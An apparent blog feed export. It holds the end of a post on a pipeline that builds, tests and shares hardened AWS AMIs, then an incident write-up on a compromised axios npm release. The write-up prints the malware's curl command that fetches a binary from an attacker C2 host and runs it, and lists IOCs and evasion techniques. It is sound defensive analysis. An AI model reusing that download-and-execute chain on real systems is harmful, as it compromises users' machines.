<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">.packer</span><span class="pi">:</span>
  <span class="na">image</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">$PACKER_BUILD_IMAGE"</span>
    <span class="na">entrypoint</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">"</span><span class="pi">]</span>
  <span class="na">id_tokens</span><span class="pi">:</span>
    <span class="na">AWS_OIDC_TOKEN</span><span class="pi">:</span>
      <span class="na">aud</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://gitlab.com"</span>
  <span class="na">variables</span><span class="pi">:</span>
    <span class="na">AWS_WEB_IDENTITY_TOKEN_FILE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">$CI_PROJECT_DIR/.aws/gitlab-oidc-token"</span>
  <span class="na">before_script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">: "${AWS_OIDC_TOKEN:?Missing GitLab AWS OIDC token.}"</span>
      <span class="s">: "${AWS_PACKER_BUILD_OIDC_ROLE_ARN:?Missing AWS Packer build OIDC role ARN.}"</span>

      <span class="s">mkdir -p "$CI_PROJECT_DIR/.aws"</span>
      <span class="s">printf '%s' "$AWS_OIDC_TOKEN" &gt; "$AWS_WEB_IDENTITY_TOKEN_FILE"</span>
      <span class="s">export AWS_ROLE_ARN="$AWS_PACKER_BUILD_OIDC_ROLE_ARN"</span>
      <span class="s">export AWS_ROLE_SESSION_NAME="gitlab-$CI_PROJECT_ID-$CI_PIPELINE_ID-$CI_JOB_ID"</span>
</code></pre></div></div>

<h2 id="testing-and-scanning-amis">Testing and Scanning AMIs</h2>

<p>Building an AMI is not enough. The pipeline needs to boot the image and prove that the expected hardening controls are present on a running instance.</p>

<p>The test fixture launches one EC2 instance from the AMI name produced by Packer. It discovers the build VPC and subnets by tag, attaches a temporary SSM-capable instance profile when one is not provided, and avoids SSH entirely.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_ami"</span> <span class="s2">"test"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tests_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>

  <span class="nx">most_recent</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">owners</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_owners</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"name"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span><span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"root-device-type"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"ebs"</span><span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"virtualization-type"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"hvm"</span><span class="p">]</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_instance"</span> <span class="s2">"test"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tests_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>

  <span class="nx">ami</span>                         <span class="o">=</span> <span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_ami</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">id</span><span class="p">)</span>
  <span class="nx">instance_type</span>               <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span>
  <span class="nx">subnet_id</span>                   <span class="o">=</span> <span class="nx">sort</span><span class="p">(</span><span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_subnets</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">ids</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span>
  <span class="nx">vpc_security_group_ids</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">security_group_ids</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">security_group_ids</span> <span class="o">:</span> <span class="p">[</span><span class="nx">one</span><span class="p">(</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">id</span><span class="p">)]</span>
  <span class="nx">iam_instance_profile</span>        <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">iam_instance_profile</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">iam_instance_profile</span> <span class="o">:</span> <span class="nx">one</span><span class="p">(</span><span class="nx">aws_iam_instance_profile</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">name</span><span class="p">)</span>
  <span class="nx">associate_public_ip_address</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">associate_public_ip_address</span>

  <span class="nx">tags</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">tags</span><span class="p">,</span>
    <span class="p">{</span>
      <span class="nx">Name</span> <span class="o">=</span> <span class="nx">format</span><span class="p">(</span><span class="s2">"%s-test"</span><span class="p">,</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span><span class="p">)</span>
    <span class="p">},</span>
  <span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The Go test loads a YAML file of hardening checks, waits for SSM to report that the instance is connected, and then runs each command through <code class="language-plaintext highlighter-rouge">AWS-RunShellScript</code>. A check passes when the command exits successfully and, when needed, stdout contains the expected value.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">hardeningCheck</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">ID</span>                   <span class="kt">string</span> <span class="s">`yaml:"id"`</span>
	<span class="n">Description</span>          <span class="kt">string</span> <span class="s">`yaml:"description"`</span>
	<span class="n">Command</span>              <span class="kt">string</span> <span class="s">`yaml:"command"`</span>
	<span class="n">ExpectStdoutContains</span> <span class="kt">string</span> <span class="s">`yaml:"expect_stdout_contains,omitempty"`</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">TestAMIHardeningChecks</span><span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">testing</span><span class="o">.</span><span class="n">T</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">t</span><span class="o">.</span><span class="n">Parallel</span><span class="p">()</span>
	<span class="n">logger</span><span class="o">.</span><span class="n">Default</span> <span class="o">=</span> <span class="n">logger</span><span class="o">.</span><span class="n">Discard</span>

	<span class="k">if</span> <span class="o">*</span><span class="n">amiName</span> <span class="o">==</span> <span class="s">""</span> <span class="p">{</span>
		<span class="n">t</span><span class="o">.</span><span class="n">Skip</span><span class="p">(</span><span class="s">"ami_name flag must be set"</span><span class="p">)</span>
	<span class="p">}</span>

	<span class="k">const</span> <span class="n">tfDir</span> <span class="o">=</span> <span class="s">"../terraform"</span>

	<span class="k">defer</span> <span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"destroy"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">destroyTerraform</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">)</span>
	<span class="p">})</span>

	<span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"deploy"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">applyTerraform</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">)</span>
	<span class="p">})</span>

	<span class="n">ssmClient</span> <span class="o">:=</span> <span class="n">aws</span><span class="o">.</span><span class="n">NewSsmClient</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">awsRegion</span><span class="p">)</span>

	<span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"validate"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">validate</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">,</span> <span class="n">ssmClient</span><span class="p">)</span>
	<span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The checks use plain YAML so security engineers can review them without having to read Go. Adding another assertion means updating the relevant checks file and letting the same test harness run it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">checks</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">1.1.1.1-cramfs-disabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">cramfs filesystem module is disabled</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">!</span><span class="nv"> </span><span class="s">lsmod</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-q</span><span class="nv"> </span><span class="s">cramfs</span><span class="nv"> </span><span class="s">&amp;&amp;</span><span class="nv"> </span><span class="s">modprobe</span><span class="nv"> </span><span class="s">-n</span><span class="nv"> </span><span class="s">-v</span><span class="nv"> </span><span class="s">cramfs</span><span class="nv"> </span><span class="s">2&gt;&amp;1</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-qE</span><span class="nv"> </span><span class="s">'install</span><span class="nv"> </span><span class="s">/bin/(true|false)'"</span>

  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">1.5.1-aslr-enabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">kernel.randomize_va_space is set to 2 (full ASLR)</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sysctl</span><span class="nv"> </span><span class="s">-n</span><span class="nv"> </span><span class="s">kernel.randomize_va_space"</span>
    <span class="na">expect_stdout_contains</span><span class="pi">:</span> <span class="s2">"</span><span class="s">2"</span>

  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">5.2.6-ssh-root-login-disabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">SSH PermitRootLogin is set to no</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sshd</span><span class="nv"> </span><span class="s">-T</span><span class="nv"> </span><span class="s">2&gt;/dev/null</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-i</span><span class="nv"> </span><span class="s">'^permitrootlogin'</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">awk</span><span class="nv"> </span><span class="s">'{print</span><span class="nv"> </span><span class="s">$2}'"</span>
    <span class="na">expect_stdout_contains</span><span class="pi">:</span> <span class="s2">"</span><span class="s">no"</span>
</code></pre></div></div>

<p>The custom check format isn’t mandatory. If a team doesn’t want to maintain a separate validation harness, the same checks can move into Ansible validation playbooks. Ansible can use SSM to run checks on the temporary instance without opening SSH, which keeps the network model mostly the same while moving the assertions into a tool more operators already know. That is probably where this project goes over time.</p>

<p>This isn’t a full substitute for every scanner or every benchmark. The wider program should still include vulnerability scanning, package inventory, and AWS Inspector coverage. These tests catch direct build regressions immediately: the service didn’t start, the kernel setting didn’t stick, the SSH drop-in didn’t get read, or the baseline package never landed.</p>

<h2 id="tagging-and-sharing-images">Tagging and Sharing Images</h2>

<p>Publishing is gated to the default branch. Merge requests can build and test, but they don’t share AMIs to the organization. Once a default-branch build passes, the publish job tags the image as published and grants launch permissions to each account in <code class="language-plaintext highlighter-rouge">account-map.yaml</code>.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">publish:ami</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.terratest</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">publish</span>
  <span class="na">needs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">packer:build</span>
      <span class="na">artifacts</span><span class="pi">:</span> <span class="kc">true</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">terratest:ami</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">published_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"</span>
      <span class="s">account_ids="$(sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" account-map.yaml)"</span>

      <span class="s">if [ -z "$account_ids" ]; then</span>
        <span class="s">printf 'No AWS account IDs found in account-map.yaml.\n' &gt;&amp;2</span>
        <span class="s">exit 1</span>
      <span class="s">fi</span>

      <span class="s">for artifact in $(printf '%s' "$AMI_ARTIFACT_IDS" | tr ',' ' '); do</span>
        <span class="s">ami_region="${artifact%%:*}"</span>
        <span class="s">ami_id="${artifact#*:}"</span>

        <span class="s">aws ec2 create-tags \</span>
          <span class="s">--region "$ami_region" \</span>
          <span class="s">--resources "$ami_id" \</span>
          <span class="s">--tags \</span>
            <span class="s">Key=ImageFactoryPublished,Value=true \</span>
            <span class="s">Key=ImageFactoryPublishedAt,Value="$published_at"</span>

        <span class="s">for account_id in $account_ids; do</span>
          <span class="s">aws ec2 modify-image-attribute \</span>
            <span class="s">--region "$ami_region" \</span>
            <span class="s">--image-id "$ami_id" \</span>
            <span class="s">--launch-permission "Add=[{UserId=$account_id}]"</span>
        <span class="s">done</span>
      <span class="s">done</span>
  <span class="na">rules</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_COMMIT_REF_NAME</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">$CI_DEFAULT_BRANCH'</span>
</code></pre></div></div>

<p>The operational details matter here. The job reads artifact IDs from the Packer manifest instead of assuming one region. It tags the AMI after tests pass, not before. It fails closed if the account map is empty. Those small choices make the release process repeatable without someone babysitting every run.</p>

<h2 id="tradeoffs-and-unknowns">Tradeoffs and Unknowns</h2>

<p>The main tradeoff is time. Building an AMI, booting it, waiting for SSM, running checks, and cleaning everything up is slower than normal application CI. The change-detection pipeline keeps the cost down by rebuilding only affected images. The boot test is still worth it when the alternative is distributing a broken base image to dozens of accounts.</p>

<p>Benchmark drift needs active ownership. CIS guidance, Marketplace images, distro defaults, and security agents all change. The validation checks should live beside the image definition so every hardening change can be reviewed with the matching test change.</p>

<p>Marketplace image handling has its own operational messiness. Product codes, owner IDs, naming patterns, and regional availability are all things you have to test in a real AWS account. Parameterizing the inputs helps, but it doesn’t remove the fact that AWS Marketplace images aren’t always as smooth as a vanilla owner-and-name AMI lookup.</p>

<p>Finally, AMI sharing is only part of distribution. Consumers still need a sane way to discover the latest approved AMI, whether that is through tags, SSM parameters, Service Catalog, Terraform data sources, or an internal platform workflow. Sharing the image makes it available. It doesn’t automatically make every team use it correctly.</p>

<h2 id="wrapping-up">Wrapping Up</h2>

<p>An image factory isn’t a compliance shortcut. It is a controlled path for choosing a trusted base, applying organization-specific deltas, testing the running result, and sharing the AMI only after the pipeline proves it is ready.</p>

<p>That’s the real goal: turn “please use the hardened image” from a slide deck request into something teams can actually use.</p>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="automation" /><category term="aws" /><category term="packer" /><category term="infra" /><summary type="html"><![CDATA[Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?]]></summary></entry><entry><title type="html">Welcome to Transitive Dependency Hell</title><link href="https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell.html" rel="alternate" type="text/html" title="Welcome to Transitive Dependency Hell" /><published>2026-03-31T00:00:00+00:00</published><updated>2026-03-31T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell.html"><![CDATA[<p>At 00:21 UTC on March 31, someone published <code class="language-plaintext highlighter-rouge">axios@1.14.1</code> to npm. Three hours later it was pulled. In between, every <code class="language-plaintext highlighter-rouge">npm install</code> and <code class="language-plaintext highlighter-rouge">npx</code> invocation that resolved <code class="language-plaintext highlighter-rouge">axios@latest</code> executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here’s what that three-hour window looked like from one developer’s MacBook.</p>

<h2 id="monday-night">Monday Night</h2>

<p>A developer sits down, opens a terminal, and runs a command they’ve run dozens of times before:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx --yes @datadog/datadog-ci --help
</code></pre></div></div>

<p>A legitimate tool from a legitimate vendor. The <code class="language-plaintext highlighter-rouge">--yes</code> flag skips npm’s confirmation prompt. The developer (or Claude) isn’t even using the tool yet, just checking its options.</p>

<p>npm resolves the dependency tree and starts writing packages to disk: <code class="language-plaintext highlighter-rouge">dogapi</code>, <code class="language-plaintext highlighter-rouge">escodegen</code>, <code class="language-plaintext highlighter-rouge">esprima</code>, <code class="language-plaintext highlighter-rouge">js-yaml</code>, <code class="language-plaintext highlighter-rouge">fast-xml-parser</code>, <code class="language-plaintext highlighter-rouge">rc</code>, <code class="language-plaintext highlighter-rouge">is-docker</code>, <code class="language-plaintext highlighter-rouge">semver</code>, <code class="language-plaintext highlighter-rouge">uuid</code>, and <code class="language-plaintext highlighter-rouge">axios</code>. All names you’d recognize, and all packages that individually look fine. But <code class="language-plaintext highlighter-rouge">axios</code> just resolved to <code class="language-plaintext highlighter-rouge">1.14.1</code>, which is not the version that Axios’s maintainers published four days earlier. It’s the version an attacker published twenty minutes ago.</p>

<h2 id="the-hijack">The Hijack</h2>

<p><code class="language-plaintext highlighter-rouge">axios@1.14.0</code> was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of <code class="language-plaintext highlighter-rouge">jasonsaayman</code>, an existing Axios maintainer, and changed the account email from <code class="language-plaintext highlighter-rouge">jasonsaayman@gmail.com</code> to <code class="language-plaintext highlighter-rouge">ifstap@proton.me</code>. With publish access, they pushed two malicious versions in quick succession:</p>

<ul>
  <li><strong>00:21:58 UTC</strong>: <code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, tagged <code class="language-plaintext highlighter-rouge">latest</code></li>
  <li><strong>01:00:57 UTC</strong>: <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, tagged <code class="language-plaintext highlighter-rouge">legacy</code></li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">latest</code> tag meant every unversioned <code class="language-plaintext highlighter-rouge">axios</code> install worldwide pulled the backdoor. The <code class="language-plaintext highlighter-rouge">legacy</code> tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: <code class="language-plaintext highlighter-rouge">plain-crypto-js</code>.</p>

<h2 id="the-postinstall-chain">The Postinstall Chain</h2>

<p><code class="language-plaintext highlighter-rouge">plain-crypto-js</code> declared <code class="language-plaintext highlighter-rouge">postinstall: node setup.js</code> in its <code class="language-plaintext highlighter-rouge">package.json</code>, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with <code class="language-plaintext highlighter-rouge">OrDeR_7077</code>) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.</p>

<p>On the developer’s Mac, CrowdStrike’s process tree captured the full chain. <code class="language-plaintext highlighter-rouge">npx</code> spawned <code class="language-plaintext highlighter-rouge">node setup.js</code>, which shelled out to <code class="language-plaintext highlighter-rouge">/bin/sh</code> to launch <code class="language-plaintext highlighter-rouge">osascript</code> against a script dropped into the per-user temp directory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">osascript</code> is Apple’s AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The <code class="language-plaintext highlighter-rouge">nohup</code> ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sh <span class="nt">-c</span> <span class="s1">'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
       &amp;&amp; /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;"'</span> <span class="se">\</span>
  &amp;&gt; /dev/null
</code></pre></div></div>

<p>Download, set executable, and launch the beacon, all in a single <code class="language-plaintext highlighter-rouge">sh -c</code> invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.</p>

<p>The output path masquerades as an Apple system daemon using the <code class="language-plaintext highlighter-rouge">com.apple.*</code> reverse-DNS convention. The <code class="language-plaintext highlighter-rouge">-d packages.npm.org/product0</code> is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The <code class="language-plaintext highlighter-rouge">-s</code> flag keeps curl silent, and the outer <code class="language-plaintext highlighter-rouge">&amp;&gt; /dev/null</code> swallows any output from the entire chain.</p>

<p>The binary immediately began beaconing to <code class="language-plaintext highlighter-rouge">142.11.206.73:8000</code> (<code class="language-plaintext highlighter-rouge">sfrclak.com</code>) over HTTP. Ten hours later, CrowdStrike’s telemetry shows <code class="language-plaintext highlighter-rouge">com.apple.act.mond</code> still running and reading <code class="language-plaintext highlighter-rouge">/Library/Preferences/com.apple.networkd.plist</code> for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you’re deciding whether a machine is worth keeping access to.</p>

<p>Meanwhile, back in <code class="language-plaintext highlighter-rouge">node_modules</code>, <code class="language-plaintext highlighter-rouge">setup.js</code> was cleaning up after itself. It deleted its own file with <code class="language-plaintext highlighter-rouge">fs.unlink(__filename)</code> and renamed a clean <code class="language-plaintext highlighter-rouge">package.md</code> to <code class="language-plaintext highlighter-rouge">package.json</code>, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.</p>

<h2 id="not-just-macs">Not Just Macs</h2>

<p>The same <code class="language-plaintext highlighter-rouge">setup.js</code> had branches for every major platform:</p>

<table>
  <thead>
    <tr>
      <th>Platform</th>
      <th>Payload Path</th>
      <th>Technique</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>macOS</td>
      <td><code class="language-plaintext highlighter-rouge">/Library/Caches/com.apple.act.mond</code></td>
      <td>AppleScript, curl, binary masquerading as Apple daemon</td>
    </tr>
    <tr>
      <td>Windows</td>
      <td><code class="language-plaintext highlighter-rouge">%PROGRAMDATA%\wt.exe</code></td>
      <td>PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops <code class="language-plaintext highlighter-rouge">.ps1</code> payload with <code class="language-plaintext highlighter-rouge">-w hidden -ep bypass</code></td>
    </tr>
    <tr>
      <td>Linux</td>
      <td><code class="language-plaintext highlighter-rouge">/tmp/ld.py</code></td>
      <td>Python script downloaded and backgrounded with <code class="language-plaintext highlighter-rouge">nohup python3</code></td>
    </tr>
  </tbody>
</table>

<p>All three phoned home to the same C2: <code class="language-plaintext highlighter-rouge">sfrclak.com:8000/6202033</code>.</p>

<h2 id="what-crowdstrike-caught-and-didnt">What CrowdStrike Caught (and Didn’t)</h2>

<p>Falcon flagged the macOS beacon as <code class="language-plaintext highlighter-rouge">MacOSApplicationLayerProtocol</code>, mapping to <a href="https://attack.mitre.org/techniques/T1071/">T1071</a> (Application Layer Protocol) under <a href="https://attack.mitre.org/tactics/TA0011/">TA0011</a> (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.</p>

<p>Everything before that ran unimpeded. The <code class="language-plaintext highlighter-rouge">node setup.js</code> postinstall hook, the <code class="language-plaintext highlighter-rouge">osascript</code> execution from a temp directory, the <code class="language-plaintext highlighter-rouge">curl</code> download and <code class="language-plaintext highlighter-rouge">chmod</code> all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.</p>

<h2 id="iocs">IOCs</h2>

<table>
  <thead>
    <tr>
      <th>Indicator</th>
      <th>Type</th>
      <th>Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>C2 Domain</td>
      <td>Domain</td>
      <td><code class="language-plaintext highlighter-rouge">sfrclak.com</code></td>
    </tr>
    <tr>
      <td>C2 IP</td>
      <td>IPv4</td>
      <td><code class="language-plaintext highlighter-rouge">142.11.206.73</code></td>
    </tr>
    <tr>
      <td>C2 Port</td>
      <td>Port</td>
      <td><code class="language-plaintext highlighter-rouge">8000</code></td>
    </tr>
    <tr>
      <td>Campaign ID</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">6202033</code></td>
    </tr>
    <tr>
      <td>macOS Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">/Library/Caches/com.apple.act.mond</code></td>
    </tr>
    <tr>
      <td>macOS Hash</td>
      <td>SHA256</td>
      <td><code class="language-plaintext highlighter-rouge">92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
    </tr>
    <tr>
      <td>Windows Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">%PROGRAMDATA%\wt.exe</code></td>
    </tr>
    <tr>
      <td>Linux Payload</td>
      <td>File</td>
      <td><code class="language-plaintext highlighter-rouge">/tmp/ld.py</code></td>
    </tr>
    <tr>
      <td>Tracking ID</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">packages.npm.org/product0</code></td>
    </tr>
    <tr>
      <td>Compromised Packages</td>
      <td>npm</td>
      <td><code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, <code class="language-plaintext highlighter-rouge">plain-crypto-js@4.2.0-4.2.1</code></td>
    </tr>
    <tr>
      <td>Hijacked Account</td>
      <td>npm</td>
      <td><code class="language-plaintext highlighter-rouge">jasonsaayman</code> (email changed to <code class="language-plaintext highlighter-rouge">ifstap@proton.me</code>)</td>
    </tr>
    <tr>
      <td>XOR Key</td>
      <td>String</td>
      <td><code class="language-plaintext highlighter-rouge">OrDeR_7077</code></td>
    </tr>
  </tbody>
</table>

<h2 id="takeaways">Takeaways</h2>

<p><strong>Check your lockfiles now.</strong> Search <code class="language-plaintext highlighter-rouge">package-lock.json</code>, <code class="language-plaintext highlighter-rouge">yarn.lock</code>, and <code class="language-plaintext highlighter-rouge">pnpm-lock.yaml</code> for <code class="language-plaintext highlighter-rouge">axios@1.14.1</code>, <code class="language-plaintext highlighter-rouge">axios@0.30.4</code>, or any reference to <code class="language-plaintext highlighter-rouge">plain-crypto-js</code>. If you find them, assume the installing machine is compromised.</p>

<p><strong>Disable postinstall scripts.</strong> Add <code class="language-plaintext highlighter-rouge">ignore-scripts=true</code> to <code class="language-plaintext highlighter-rouge">~/.npmrc</code>. When a package legitimately needs a postinstall hook for native compilation, run <code class="language-plaintext highlighter-rouge">npm rebuild &lt;package&gt;</code> explicitly after reviewing the script. This single setting would have stopped the entire attack chain.</p>

<p><strong>Monitor for <code class="language-plaintext highlighter-rouge">osascript</code> spawned by <code class="language-plaintext highlighter-rouge">node</code>.</strong> There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.</p>

<p>The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm’s default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every <code class="language-plaintext highlighter-rouge">npm install</code> into an implicit trust decision across hundreds of packages maintained by people you’ve never met. The Axios maintainer account was compromised for three hours. That was enough.</p>

<hr />

<p><em>This is the third post in a series on software supply chain attacks. The previous posts covered the <a href="/2026/03/20/typosquatting-trivy">Trivy ecosystem compromise</a> and <a href="/2026/03/24/sha-pinning-is-not-enough">the limits of SHA pinning</a>. Joe Desimone’s <a href="https://gist.github.com/joe-desimone/36061dabd2bc2513705e0d083a9673e7">technical analysis</a> of the axios compromise is worth reading in full.</em></p>

